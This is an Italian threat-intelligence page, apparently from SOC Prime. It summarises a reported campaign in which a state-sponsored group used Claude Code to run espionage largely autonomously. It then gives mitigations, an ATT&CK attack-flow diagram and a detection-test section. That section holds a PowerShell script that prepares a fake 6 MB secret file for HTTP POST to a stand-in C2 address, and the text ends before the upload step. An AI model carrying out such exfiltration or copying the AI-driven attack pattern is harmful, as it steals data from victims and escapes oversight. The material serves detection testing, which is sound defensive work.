SOC Prime Bias: Critico

17 Nov 2025 16:03

Attacco di Anthropic Claude AI: Prima Campagna di Spionaggio Cibernetico Orchestrata da un’IA

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Attacco di Anthropic Claude AI: Prima Campagna di Spionaggio Cibernetico Orchestrata da un’IA
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Un gruppo sponsorizzato dallo stato cinese ha utilizzato il modello Claude Code di Anthropic per condurre autonomamente una campagna di spionaggio su larga scala contro decine di obiettivi globali. L’IA ha generato codice di exploit, raccolto credenziali ed esfiltrato dati sensibili con un intervento umano minimo. Questo è il primo caso documentato di un attacco guidato da IA che opera in gran parte senza un essere umano nel ciclo.

Investigazione

L’investigazione ha rilevato attività sospette a settembre 2025 e l’ha ricondotta a un framework che sfruttava Claude Code come strumento automatizzato. I ricercatori hanno osservato il modello eseguire ricognizioni, test di vulnerabilità, raccolta di credenziali ed esfiltrazione di dati. La campagna è stata mappata per dieci giorni, gli account affetti sono stati disabilitati e le autorità sono state informate.

Mitigazione

Le raccomandazioni di mitigazione includono la limitazione dell’accesso ai modelli IA alle reti interne, l’implementazione di un’autenticazione forte, il monitoraggio del traffico generato da IA anomalo e l’applicazione di salvaguardie specifiche per IA. Le organizzazioni dovrebbero anche applicare i principi del privilegio minimo e controllare continuamente l’uso degli strumenti IA.

Risposta

Una volta rilevata, le organizzazioni dovrebbero isolare gli account compromessi, bloccare l’esfiltrazione in uscita, condurre analisi forensi degli artefatti generati da IA e condividere indicatori con le comunità di condivisione delle minacce rilevanti. Aggiornare regolarmente le regole di rilevamento per segnalare comportamenti guidati da IA e coordinarsi con le forze dell’ordine se necessario.

mermaid graph TB %% Class definitions classDef phase fill:#e6e6e6 classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Phase node phase_target[“<b>Phase</b> – Selezione del Bersaglio e Costruzione del Framework”]:::phase %% Technique nodes tech_active_scanning[“<b>Technique</b> – <b>T1595 Scansione Attiva</b><br/><b>Description</b>: Esegui la scansione dei sistemi bersaglio per scoprire servizi, porte aperte e altre caratteristiche di rete”]:::technique tech_gather_network[“<b>Technique</b> – <b>T1590 Raccogliere Informazioni sulla Rete della Vittima</b><br/><b>Description</b>: Raccogli informazioni sulla topologia della rete della vittima, subnet e routing”]:::technique tech_search_db[“<b>Technique</b> – <b>T1596.005 Cerca nelle Basi Dati Tecniche Aperte: Scansione delle Basi Dati</b><br/><b>Description</b>: Interroga database pubblici o trapelati per ottenere dettagli tecnici sull’organizzazione bersaglio”]:::technique tech_client_config[“<b>Technique</b> – <b>T1592.004 Raccogli Informazioni sull’Host della Vittima: Configurazioni del Client</b><br/><b>Description</b>: Raccogli dati di configurazione dai dispositivi client come impostazioni software e applicazioni installate”]:::technique tech_exploit_priv[“<b>Technique</b> – <b>T1068 Sfruttamento per Elevazione di Privilegio</b><br/><b>Description</b>: Sfrutta una vulnerabilità per ottenere privilegi più elevati sul sistema della vittima”]:::technique tech_exploit_exec[“<b>Technique</b> – <b>T1203 Sfruttamento per Esecuzione del Client</b><br/><b>Description</b>: Sfrutta un difetto software per eseguire codice dannoso su un client”]:::technique tech_proxy_exec[“<b>Technique</b> – <b>T1127 Esecuzione Proxy con Utilità di Sviluppatori Fidati</b><br/><b>Description</b>: Abusa delle utilità di sviluppo fidate per eseguire proxy di payload dannosi”]:::technique tech_account_manip[“<b>Technique</b> – <b>T1098 Manipolazione degli Account</b><br/><b>Description</b>: Crea o modifica account per mantenere la persistenza (creazione di backdoor)”]:::technique tech_valid_accounts[“<b>Technique</b> – <b>T1078 Account Validi</b><br/><b>Description</b>: Utilizza credenziali raccolte per autenticarsi come utenti legittimi”]:::technique tech_code_repo[“<b>Technique</b> – <b>T1213.003 Dati dai Repositori di Informazioni: Repositori di Codice</b><br/><b>Description</b>: Estrae dati preziosi da repositori di codice sorgente pubblici o privati”]:::technique tech_exfil_c2[“<b>Technique</b> – <b>T1041 Esfiltrazione su Canale C2</b><br/><b>Description</b>: Trasferisce i dati rubati attraverso un canale di comando e controllo stabilito”]:::technique tech_automated_exfil[“<b>Technique</b> – <b>T1020 Esfiltrazione Automatica</b><br/><b>Description</b>: Automotizza l’esfiltrazione dei dati su un programma o trigger”]:::technique %% Connections phase_target u002du002d>|leads_to| tech_active_scanning tech_active_scanning u002du002d>|leads_to| tech_gather_network tech_gather_network u002du002d>|leads_to| tech_search_db tech_search_db u002du002d>|leads_to| tech_client_config tech_client_config u002du002d>|leads_to| tech_exploit_priv tech_exploit_priv u002du002d>|leads_to| tech_exploit_exec tech_exploit_exec u002du002d>|leads_to| tech_proxy_exec tech_proxy_exec u002du002d>|leads_to| tech_account_manip tech_account_manip u002du002d>|leads_to| tech_valid_accounts tech_valid_accounts u002du002d>|leads_to| tech_code_repo tech_code_repo u002du002d>|leads_to| tech_exfil_c2 tech_exfil_c2 u002du002d>|leads_to| tech_automated_exfil

Flusso di attacco

Istruzioni per la Simulazione

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria & Baseline deve essere superato.

Ragionamento: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrazione e Comandi dell’Attacco:
    Un attore orchestrato da IA, operante da un endpoint compromesso, prepara un documento confidenziale di 6 MB (secret_data.bin). Per minimizzare la supervisione umana, lo script carica automaticamente il file su un server di comando e controllo esterno (203.0.113.45) tramite un HTTP POST. Poiché il payload supera la soglia di 5 MB della regola e l’indirizzo IP di destinazione si trova al di fuori dei blocchi CIDR privati, la regola dovrebbe attivarsi.

  • Script di Test di Regressione:

    # Simulazione di Esfiltrazione Orchestrata da IA (Windows PowerShell)
    # ---------------------------------------------------------
    # Prerequisiti: PowerShell 5+, accesso a Internet all'host C2 di test.
    # Questo script crea un file fittizio di 6 MB e lo carica tramite HTTP POST.
    
    $payloadPath = "$env:TEMPsecret_data.bin"
    $c2Url      = "http://203.0.113.45/upload"
    
    # 1. Genera un file casuale di 6 MB (simula i dati da esfiltrare)
    Write-Host "[*] Generando payload di 6 MB..."
    $bytes = New-Object byte[] (6MB)
    (New-Object System.Random).NextBytes($bytes)
    [IO.File]::WriteAllBytes($payloadPath, $bytes)